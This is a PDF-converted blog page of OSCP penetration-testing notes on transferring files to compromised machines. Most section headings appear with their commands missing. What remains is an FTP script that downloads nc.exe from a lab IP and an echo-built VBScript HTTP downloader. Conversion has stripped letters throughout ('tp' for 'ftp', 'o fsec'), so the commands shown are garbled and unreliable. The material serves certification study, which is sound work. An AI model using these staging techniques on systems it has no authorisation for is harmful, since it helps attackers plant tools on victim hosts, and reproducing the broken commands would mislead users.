OSCP Notes – File Transfers
OSCP Notes – File Transfers
SECURISM
All about Information Security
wget
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
scp
ssh
curl
tp
s tp
nc
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
TFTP
In Kali, create /t tpboot/ directory speci cally only for TFTP daemon service
FTP
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
echo open 192.168.10.5 21> tp.txt
echo USER o fsec>> tp.txt
echo tp>> tp.txt
echo bin >> tp.txt
echo GET nc.exe >> tp.txt
echo bye >> tp.txt
tp –v -n -s: tp.txt
VBSCRIPT
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject(“Microso t.XMLHTTP”) >> wget.vbs
echo http.Open “GET”, strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = “” >> wget.vbs
echo strBu fer = “” >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
POWERSHELL
DEBUG.EXE
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
wine <exe le>
Text le will be generated, simply copy and paste the text le contents to the shell.
Advertisements
REPORT THIS AD
SHARE THIS:
Twitter Facebook
Like
Be the first to like this
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Be the first to like this.
Search …
PAGES
Contact
OSCP Notes – Bu fer Over low
OSCP Notes – Exploitation
OSCP Notes – File Transfers
OSCP Notes – Information Gathering
OSCP Notes – Meterpreter
OSCP Notes – Password Attacks
OSCP Notes – Port Forwarding
OSCP Notes – Port Scanning
OSCP Notes – Privilege Escalation (Linux)
OSCP Notes – Privilege Escalation (Windows)
OSCP Notes – Shells
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD